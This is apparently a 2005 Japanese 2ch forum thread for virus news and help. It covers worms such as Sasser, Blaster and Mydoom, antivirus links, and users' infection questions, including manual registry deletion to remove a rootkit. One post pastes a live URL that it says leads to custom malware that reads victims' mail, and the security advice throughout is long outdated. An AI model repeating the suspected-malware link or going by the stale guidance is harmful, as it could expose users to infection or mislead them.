ウィルス情報&質問 総合スレッド☆Part33

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
ウィルスに関わる話題・質問はこちら。
Winny関連のウィルスは、Download板に専門スレッドがあります。

【  最  重  要  事  項  】
ウィスルやブラクラだと思われる物の直リンは厳禁!!!!!!!!!!
質問の時は頭の『ht』を抜いて貼り付ける事

【質問する前、書き込む前に必読する】 テンプレサイト
コンピュータウィルス総合スレッド テンプレミラーサイト(PC初心者板)
http://pcqa.tripod.co.jp/virus.htm
【警報】Winnyを狙ったワーム・ウイルス情報 テンプレまとめサイト(Download板)
http://www.geocities.jp/kemkzuenc/Antinny.html

尚、質問・回答が効率的に行えるよう、質問時には次のテンプレを使用してください。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
2名無しさん@お腹いっぱい。:2005/10/22(土) 14:30:59
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
 製品名:ウイルスバスター2005インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/Japanese/
 製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。
3名無しさん@お腹いっぱい。:2005/10/22(土) 14:31:04 BE:19053465-#
2げt
前スレ1000GJ
4999:2005/10/22(土) 14:31:40
あぶね!
次スレ立てるところだったwwwwwww
>>1


ウィルス情報&質問 総合スレッド☆Part32(前スレ)
http://pc8.2ch.net/test/read.cgi/sec/1123855818/
5名無しさん@お腹いっぱい。:2005/10/22(土) 14:31:42
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
6名無しさん@お腹いっぱい。:2005/10/22(土) 14:32:26
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
7名無しさん@お腹いっぱい。:2005/10/22(土) 14:33:16
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
8名無しさん@お腹いっぱい。:2005/10/22(土) 14:33:19
ここの板には不親切な人しかいないのですね
まだ問題は解決していませんよ
9名無しさん@お腹いっぱい。:2005/10/22(土) 14:34:28
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット
10名無しさん@お腹いっぱい。:2005/10/22(土) 14:35:20
「がいしゅつです」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part36
http://tmp4.2ch.net/test/read.cgi/download/1111385299/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part5
http://pc5.2ch.net/test/read.cgi/sec/1107065884/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイト見たら…助けて下さい!Part52
http://pc5.2ch.net/test/read.cgi/pcqa/1111405528/
11名無しさん@お腹いっぱい。:2005/10/22(土) 14:36:08
関連スレッド

Winnyを狙ったワーム・ニュイルス情報 Part42
http://tmp5.2ch.net/test/read.cgi/download/1123171787/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc8.2ch.net/test/read.cgi/sec/1065964513/
【差出人】WORM_NETSKY【詐称】
http://pc5.2ch.net/test/read.cgi/sec/1080741342/
「Nimda !! 」【その4】
http://pc5.2ch.net/test/read.cgi/sec/1001864573/
エロサイトを見たら…助けてください!Part57
http://pc8.2ch.net/test/read.cgi/pcqa/1122562575/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc8.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc8.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc8.2ch.net/test/read.cgi/sec/1086494732/

関連スレは次スレに移行してる場合もあります。


質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/
12名無しさん@お腹いっぱい。:2005/10/22(土) 14:36:47
ググったけど、英語でよくわからない!人は

Excite エキサイト 翻訳 英語翻訳>ウェブページ翻訳
ttp://www.excite.co.jp/world/english/web/

を使ってみよう。

PC関係の用語が分からない場合は、下記のサイトでも調べて見ましょう。
・IT用語辞典e-Words
http://e-words.jp/
・アスキーデジタル用語辞典
http://yougo.ascii24.com/

前スレ
ウィルス情報&質問 総合スレッド☆Part32
http://pc8.2ch.net/test/read.cgi/sec/1123855818/
13名無しさん@お腹いっぱい。:2005/10/22(土) 14:38:59
>1
乙カレー
14名無しさん@お腹いっぱい。:2005/10/22(土) 14:57:59
激しくいおつ
15名無しさん@お腹いっぱい。:2005/10/22(土) 14:59:32
おっぱいとカレーライス    ハアハア
16名無しさん@お腹いっぱい。:2005/10/22(土) 16:41:58
前スレのおっぱい画像くれるウイルスが気になる。
17名無しさん@お腹いっぱい。:2005/10/22(土) 16:49:45
山田じゃん?
18名無しさん@お腹いっぱい。:2005/10/22(土) 17:49:28
前1000GJ
19名無しさん@お腹いっぱい。:2005/10/22(土) 19:32:34
【使用OS】
XP
【WindowsUpdateしてるか】
していません
【AntiVirusは何を使っているか】
ノートン2004
【ちゃんとUpdateしてるか】
しています
【スキャンした結果(ウイルス名・発見場所)】
Trojan Horse  発見場所 vbsys2.dll
【症状を具体的に、分かる限りすべて書く】
PC動作が重くなったり、スパムメールが多々送られてきます。
【何をしたらそんなことになったのか】
IEエクスプローラを開いた瞬間感染しました
【これまでにとった措置】
ファイルを消去しようと試みましたが、消去できません。
ノートンでスキャンして消そうとも思いましたが無理でした。
【その他の質問】
解決できたとしても やはり受けた症状は残るのでしょうか?

結構緊急なんで指導をよろしくお願いします;;;
20名無しさん@お腹いっぱい。:2005/10/22(土) 19:54:29
はいはいわろすわろす
21名無しさん@お腹いっぱい。:2005/10/22(土) 22:51:25
こないだ、ポルノサイト見てたらオフィスソフトが動き出し何かインストールしてたようだが
あれってスパイウェア?
22名無しさん@お腹いっぱい。:2005/10/22(土) 22:54:23
マルチ氏ね
23名無しさん@お腹いっぱい。:2005/10/23(日) 02:18:49
いわゆるウィルス製造罪法案(刑法改正)が、提出されたけど、成立しそうですね。
http://www.clb.go.jp/bk_law/163/text/ho4.htm
http://www.moj.go.jp/HOUAN/houan34.html
http://d.hatena.ne.jp/HiromitsuTakagi/20040515
24名無しさん@お腹いっぱい。:2005/10/23(日) 03:37:29

アンチウイルスの性能評価をしている「AV Comparitives」の8月のテスト結果。
http://www.av-comparatives.org/seiten/ergebnisse/report07.pdf
http://www.av-comparatives.org/
1位 Kaspersky
2位 Symantec(ノートン)

スパイウェアに対する検出力評価
ttp://www.infoworld.com/article/05/09/19/38FEspy_1.html
1位 F-Secure
2位 Webroot
3位 LANDesk
4位 Sunbelt
5位 SurfControl
6位 McAfee
7位 Trend Micro
8位 eTrust
9位 NOD32 v2.5
25名無しさん@お腹いっぱい。:2005/10/23(日) 04:52:04
>>1
乙!
26名無しさん@お腹いっぱい。:2005/10/23(日) 06:05:42
※大学進学情報の広告サイト「キャンパス・アサヒコム」クラック事件の情報※

シェアが大きな御三家は対応したそうです。

ウイルス駆除の方法について
http://www.campusasahi.com/

※トレンドマイクロ社では、今回のウイルスに関しては、以下のように対応済みとのことです。
■ CHM_DROPPER.CP 日本語情報(トレンドマイクロ社)
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CHM_DROPPER.CP
■ TROJ_DROPPER.PC 日本語情報(トレンドマイクロ社)
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DROPPER.PC
■ BKDR_PCCLIENT.BV 日本語情報(トレンドマイクロ社)
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_PCCLIENT.BV

※シマンテック社では、今回のウイルスに関しては、以下のように対応済みとのことです。
■ Trojan.Dropper(日本語情報) 対応日:2000年02月07日 (米国時間)
http://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.dropper.html
■ Backdoor.Darkmoon.B(英語情報) 対応日:2005年10月21日(米国時間)
http://securityresponse.symantec.com/avcenter/venc/data/backdoor.darkmoon.b.html
(日本語情報については24日頃公開予定とのことです)
■ W32.Kipis.A@mm(日本語) 対応日:2004年12月23日 (米国時間)
http://www.symantec.com/region/jp/avcenter/venc/data/[email protected]
これらのウイルスに対応したウイルス定義ファイルは下記のサイトから入手可能とのことです。
http://www.symantec.com/region/jp/avcenter/download.html

※マカフィー社によりますと、今回のウイルスに関しては、10月20日午前1時ごろにリリースした
「定義ファイル4608」で、対応済みとのことです。
http://www.mcafee.com/japan/security/virB.asp?v=BackDoor-CKB
27素人:2005/10/23(日) 10:25:51
2ちゃんねるで
添付物を開いたら黒背景に白抜きのニコちゃんマークが
三つ並んだ画面になり
you are idiot a ha ha ha ha!
と合唱して
ウイルスが来ました。ノートンが、
ファイル名を変更して保存してくれましたが
それでは不十分でしょうか? (/.;)
28名無しさん@お腹いっぱい。:2005/10/23(日) 10:44:38
添付物ねぇ・・・
29名無しさん@お腹いっぱい。:2005/10/23(日) 12:54:55
ウィルス検出したんですけど・・・。
OSはXPで、アップデートはしてます。使ってるのはウィルスバスターです。
ウィルス名はVBS_REDLOF.A-1で、場所はC:\Documents and Settings\(ユーザー名)\Local Settings\Temporary Internet Files\Content.IE5\GXA3KT2J\page013[1].htmです。
なんか、隔離しました(安全です)って書いてあるんやけど、じっさい安全なのでしょうか。
30名無しさん@お腹いっぱい。:2005/10/23(日) 12:56:05
私の姉は、創価学会員で精神科に通院しております。つい最近地区の編成で
バリバリ地区に編成されました。

編成したところ、姉の心理状態が丸っきり変わってしまって”躁状態”になってしました。
日中、深夜かまわず聖教新聞を切り抜いたり、記事に大声で絶賛したり何時間も勤行揚げたり
と忙しくしております。

通院している病院の主治医は、「生活上何か変化ありましたか?」と聞かれても
”実は我が家は創価学会で・・・”と言えずにそのままにしております。
主治医は、なぜ精神状態が変わったのか凄く不思議がっています。
31名無しさん@お腹いっぱい。:2005/10/23(日) 13:11:00
>>30
外因性の躁状態は、反動でもの凄い鬱になるよ。
姉貴が自殺しないように、気をつけな。
32名無しさん@お腹いっぱい。:2005/10/23(日) 13:25:30
,j;;;;;j,. ---一、 `  ―--‐、_ l;;;;;;    池田先生は、偉大な指導者
 {;;;;;;ゝ T辷iフ i    f'辷jァ  !i;;;;;   だから世界中から勲章が贈られるんだ
  ヾ;;;ハ    ノ       .::!lリ;;r゙     
   `Z;i   〈.,_..,.      ノ;;;;;;;;>   そんなふうに考えていた時期が
   ,;ぇハ、 、_,.ー-、_',.    ,f゙: Y;;f.   俺にもありました
   ~''戈ヽ   `二´    r'´:::. `!
33名無しさん@お腹いっぱい。:2005/10/23(日) 13:55:01
すいません、IDチェッカーを使って2ちゃんの書き込みから住所が分るって言ってる人がいるんですけど本当なんでしょうか?

http://sports9.2ch.net/test/read.cgi/billiards/1124849366/153
http://sports9.2ch.net/test/read.cgi/billiards/1124849366/159
34名無しさん@お腹いっぱい。:2005/10/23(日) 14:03:58
1000人をどうこうするウィルスってなんすか
35名無しさん@お腹いっぱい。:2005/10/23(日) 14:11:43
教えてください↓のURLに対してのコメントなのですが、これはノートンが感知しないウィルスなのでしょうか?

http://deadman44-2.jp/cgi-bin/imgboard/img-box/img20041217223836.jpg

742 名前: 名無しの心子知らず [sage] 投稿日: 2005/10/23(日) 13:22:16 ID:X1A4YLRp
あのURLをパソコン詳しい人に見せたら、あれは出回っているのではなくて
自作らしいです。
あれは相手のパソコン内の情報を
見られるらしいよ。メール内容とか。仕掛けた人が。
ウイルスソフトにひっかからないらしいです。
私は開かなかったけど。2chではあんまりURL開かないほうが良いよ。

3635:2005/10/23(日) 14:35:37
↑これは、もういいです。
自己解決しました。
37名無しさん@お腹いっぱい。:2005/10/24(月) 01:22:58
Windowsを起動するたびにようこそ画面こんなメッセージが出るようになりました。

これをあなたが見る頃 私はもう この世の者ではないでしょうね
もはや死ぬしかなようだ

だけどタダでは死にません

クズを1000匹道連れだ

喜べお前は 605 匹目

他にも、スクリーンセーバーがkimmoというのに変わったり、
ぬるぽ♪ぬるぽ♪オートラン♪
と、いうのもたまにでます。

ちなみにWindowsXpでウィルスバスター2006を使用しています。
検索では発見されなかったんですが・・・。

最近使い始めたファイル共有ソフトが原因かと思われます。
いろいろググって見ましたがやはりよくわからず・・・。
どなたか対処方法のほどを教えてください。
38名無しさん@お腹いっぱい。:2005/10/24(月) 02:15:52
>>37
>どなたか対処方法のほどを教えてください

巣に(・∀・)カエレ!!!!
http://tmp5.2ch.net/download/
39名無しさん@お腹いっぱい。:2005/10/24(月) 03:12:55
WindowsXPを使ってるんですが
タスクマネージャーを見たらsvchost.exeが六つも有ったんで
びっくりして直ぐさまネットから切り離してスタンドアローンでいろいろ試してるんですが
ノートンでは何も検出されませんでした
他のソフトでもスキャンしたんですが全く知らないexeが大量にでてきただけで状況は変わらず(そのexeは除去しました)
パソコン内をsvchostで検索したんですが出てきたのは
SVCHOST.EX_
SVCHOST.EXE-3530F672pf
svchost.exe
だけでした
ホームのページが変わってたんでスパイウェアをチェックするツールを使って見たんですがCnsMinしか検出されませんでした
タスクマネージャーにあるsvchostはSYSTEMが三つ、NETWORK SERVICEが二つ、LOCAL SERVICEが一つです
この書き込みは携帯からやってます
どうか解決方法を教えて下さいお願いします
40名無しさん@お腹いっぱい。:2005/10/24(月) 09:15:31
41名無しさん@お腹いっぱい。:2005/10/24(月) 14:13:29
砂時計がずっと点滅してるんですが、何かに感染したのでしょうか?
42名無しさん@お腹いっぱい。:2005/10/24(月) 18:16:35
>>39
別に普通じゃないの?俺も5個くらいあった。
もし、ユーザー名で実行されてたら…((((;゚д゚)))ガクガクブルブル
43名無しさん@お腹いっぱい。:2005/10/24(月) 18:26:05
>>33
ウソです。IDチェッカーは自分のIPを返すだけの、ネタサイトです。
44名無しさん@お腹いっぱい。:2005/10/24(月) 19:14:52
UDPでポート1026,1027,1028,1029,1030に
ガンガン来るんですけど
なんですか
45名無しさん@お腹いっぱい。:2005/10/24(月) 19:50:15
>>44
ICSMGR.exe (インターネット接続の共有) じゃね?
46名無しさん@お腹いっぱい。:2005/10/24(月) 22:11:19
PC再起動したら画面が上下にもごもご動いて止まらなくなりました。
ウイルスだと思うのですが、対処法よろしくお願いします。
酔いそう・・・
47名無しさん@お腹いっぱい。:2005/10/24(月) 23:08:48
【使用OS】windowsXPhomeSP2
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ノートンインターネットセキュリティー2005
【ちゃんとUpdateしてるか】最後にしたのは2週間ぐらい前だったとおもいます。
【スキャンした結果(ウイルス名・発見場所)】不明
【別のオンラインスキャンしたならその結果は】不明
【症状を具体的に、分かる限りすべて書く】
パソコン起動時にデスクトップが表示されてから、いつものように数秒待っていたら、
いきなり」ブルースクリーンがでて、その後、winddows自体が起動できなくなりました。
起動時こんな文字が出ます。

次のファイルが存在しないかまたは壊れているため、windonwsを
起動できませんでした。
\windos\system32\config\system

オリジナルセットアップCD-ROMからwindowsセットアップ
を起動して、このファイルを修復できます。
修復するには、最初の画面で`R`キーを押してください。

と出ます。
【何をしたらそんなことになったのか】
2chであったゲームをダウンロード→解凍→クリックしたんですが、起動できなかったので削除しました。
そのせいかもしれません。
【これまでにとった措置】
セットアップするためのデータは壊れているHDに入っているんで、どうすればいいかわかりません。
リカバリーCDはついてなくって、買ったときにHDにデータとしてついているんです。
一応、ディスク化できるみたいだったんですが、しないままにこの状態になってしまいました。orz
【その他の質問】
windowsやセーフモードがまったく起動できず、困っております。NECのLaVie LT500/6です
48名無しさん@お腹いっぱい。:2005/10/24(月) 23:18:14
みなさんはじめまして。どうやらまずいページを踏んでしまったようです。
いろいろやったんですが、レジストリの操作で詰まってしまいました。
アドバイスをお願いします。

【使用OS】
 Windows XP SP1

【WindowsUpdateしてるか】
 感染してから約二ヶ月ぶりにしました

【AntiVirusは何を使っているか】
 Norton Internet Security Professional 2004(Norton AntiVirus)

【ちゃんとUpdateしてるか】
 毎週しています

【スキャンした結果(ウイルス名・発見場所)】
 ウィルス名:Hacktool.Rootkit 発見場所:C:\WINDOWS\System32\SVKP.sys

【別のオンラインスキャンしたならその結果は】
 トレンドマイクロオンラインスキャンを行いましたが、すでに検疫していたため何も検出されませんでした。

【症状を具体的に、分かる限りすべて書く】
 今わかっているのはP2Pソフト「Share」を起動すると「Error:loader couldn't initialize service!」とでて、
 同時にAntiVirusがSVKP.sysのHacktool.Rootkitを検出します。
 この際AntiVirusは「修復できませんでした」「アクセスが拒否されました」という反応を示します。

【何をしたらそんなことになったのか】
 tp://cgibin.k-server.org/index2.html
 10/21にここを踏んで感染したみたいです。

続く
49名無しさん@お腹いっぱい。:2005/10/24(月) 23:18:54
>>46
マルチ氏ね
50名無しさん@お腹いっぱい。:2005/10/24(月) 23:20:23
続き
【これまでにとった措置】
 システムの完全スキャンを行いましたが、検出したSVKP.sysを修復できなかったので検疫しました。
 シマンテックのHPで検索をかけましたが、Hacktool.Rootkitのページには対処法が「スキャンする」以外書いておらず、
 完全スキャンでも改善しないのでSVKP.sysを含む他のページを参照しながら対処することに。
 以下は内容が似ていると思われる「W32.Spybot.RDW」のページを参照しました。
 まず感染ファイルを検疫項目から削除し、レジストリから値を削除してみました。
 共通点であるHKEY_LOCAL_MACHINE\System\CurrentControlSet\ENUM\ROOT\LEGACY_SVKPと
 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SVKPの削除を試みたのですが、
 HKEY_LOCAL_MACHINE\System\CurrentControlSet\ENUM\ROOT\LEGACY_SVKPの削除ができませんでした。
 サービスが邪魔してるのではと思いましたが、services.mscを起動させてもどれが対象のサービスかわかりませんでした。
 しかし、HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SVKPを削除したせいか、
 相変わらずShareは起動しませんがHacktool.rootkitの検出はされなくなりました。
 
【その他】
 初めてregeditを使用してのレジストリ操作を行ったので、正直よくわかりませんでした。
 バックアップを取ってから行いましたが、間違ってしまうと怖いので
 HKEY_LOCAL_MACHINE\Software\Microsoft\OLEの"EnableDCOM" = "N"と
 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsaの"restrictanonymous" = "1"はいじりませんでした。
 
ちょっとした気の緩みから感染してしまったので、本当に悔やむばかりです。
文章は見づらく、浅知恵だらけだとは思いますが、どうか皆さんの力を貸して下さい。よろしくお願いします。
51名無しさん@お腹いっぱい。:2005/10/25(火) 00:02:39
>>48>>50
いつまでもグダグダやってねえでさっさとリカバリーしろ
SP2にしねえんだから、システム自体が弱いんだよ
それに、そんなのに感染したら管理者権限のアカウントが作られた上でアクセス権がいじられているって書いてあるだろうが!
バカ
52名無しさん@お腹いっぱい。:2005/10/25(火) 00:03:37
>>47
"次のファイルが存在しないかまたは壊れている" というエラー メッセージが表示され、Windows XP を起動できない場合の対処方法
ttp://support.microsoft.com/kb/880636/JA/

>>48
P2Pやってる人はDL板へ・・・
まぁ、そんなのにひっかかるのなら他にも何かもらってそうだから、再インストールをお勧めしますが。。。
5348:2005/10/25(火) 01:16:07
>>51-52
そう言われて踏ん切りがつきました!!
regeditでSVKPを検索し、リカバリ覚悟で全て消してやりましたw
そしたら症状は無くなり、今まで通り使えるようになりましたよ。
54名無しさん@お腹いっぱい。:2005/10/25(火) 07:59:35
>47
自分も同じ症状になって結局リカバリーしますた。
55名無しさん@お腹いっぱい。:2005/10/25(火) 14:21:41
UDPでPort 44871にたくさんパケットが飛んでくるのですが、
なにかワームが流行しているのでしょうか?
56名無しさん@お腹いっぱい。:2005/10/25(火) 18:56:29
>>55
あんたが変なのに感染しているから呼び込んでいるんですよ
57名無しさん@お腹いっぱい。:2005/10/25(火) 19:51:31
>>55
ポートがわかっているなら、↓で調べられたし。
http://www.seifried.org/security/ports/44000/44871.html

WindowsのMessaging Serviceが使ってるので、
香港、大陸からのお漏らしのような希ガス。

2000、XP系のサービスをデフォルトのまま切っていないと、
中国語でデスクトップにメッセージがヒョッコリ出るかも、あるよ。
文字化けがひどいので、悪意かどうかは不明。善意のはずはなかろけど。
58名無しさん@お腹いっぱい。:2005/10/25(火) 21:58:35
>>55
自分もリカバリしたいんですが、Cがないためにできないですorz
>>52さんの方法で一回やってみます
59名無しさん@お腹いっぱい。:2005/10/25(火) 22:37:10
症状:ウイルスっぽい。ログオンして10秒ほどでExplorar.exeが強制終了される。
その数秒後に画面が消える。でもPCやモニターの電源は入ったまま。何押しても無反応。
セーフモードなら起動は出来るがノートン先生が強制終了される。
そしてIEでも他のブラウザでもネットに繋がらない。
お手上げです。原因&対処法わかりませんでしょうか。OSはXPheです。
60名無しさん@お腹いっぱい。:2005/10/25(火) 23:45:04
>>59
リカバリ
61名無しさん@お腹いっぱい。:2005/10/26(水) 00:33:57
※ウイルスの速報
■Mocbot.Aが悪用するのは、「MS05-047」ではなく「MS05-039」だった
http://internet.watch.impress.co.jp/cda/news/2005/10/25/9604.html
当初、Windows XP/2000におけるプラグアンドプレイの脆弱性「MS05-047」を突いて
侵入するとされていたウイルス「Mocbot.A」だが、実際にはMS05-047ではなく、
8月に公開された別のプラグランドプレイの脆弱性「MS05-039」を突くウイルスだったことがわかった。

■2005/10/26で対応しているアンチウイルス製品
ウイルスバスター
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=BKDR%5FMOCBOT%2EA
F-Secure(カスペルスキー含む)
http://www.f-secure.com/weblog/archives/archive-102005.html#00000685
McAfee
http://vil.nai.com/vil/content/v_136637.htm
ノートン
http://securityresponse.symantec.com/avcenter/venc/data/w32.mocbot.a.html
62名無しさん@お腹いっぱい。:2005/10/26(水) 00:37:48
>>59
>Explorar.exe
パチモンですね
63名無しさん@お腹いっぱい。:2005/10/26(水) 02:40:53
TROJ_ABONE.Aってのが検出されたんですが、ググっても情報が出てきません。
トロイということしかわかりません。どんな症状が出るウィルスなんでしょうか?
6459:2005/10/26(水) 02:47:43
>>62
つまり、ウイルスによってEXPLORER.EXEが書き換えられているのが原因てことでしょうか?
セーフモードでWINDOWSフォルダ内のEXPLORER.EXEを実行すると、
マイドキュメントが開いただけなんですがおかしいでしょうか?
あと、EXPLORER.EXEは3つあって、WINDOWS内と、WINDOWSのSYSTEM32\DLLCACHEと、
SoftwareDistribution\Download\何か長い文字列 ってとこにあるんですがどれが原因と思われますか?
65名無しさん@お腹いっぱい。:2005/10/26(水) 02:53:49
>>64
よく嫁
66名無しさん@お腹いっぱい。:2005/10/26(水) 03:16:42
>>63
トレンドマイクロの米サイトで見つけた。
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ%5FABONE%2EA&VSect=T
だいぶ前にダウソ板で少し話題になってたけど、「あぼーん」って命名されていたとは知らんかったなー。
そんなわけですんで、一緒に巣へ帰りましょう。
67名無しさん@お腹いっぱい。:2005/10/26(水) 03:24:51
すみません。3日間調べましたが分かりません。

WinnyでDLした動画か音楽関連のファイル(メディアプレイヤー関連のアイコンでした)を
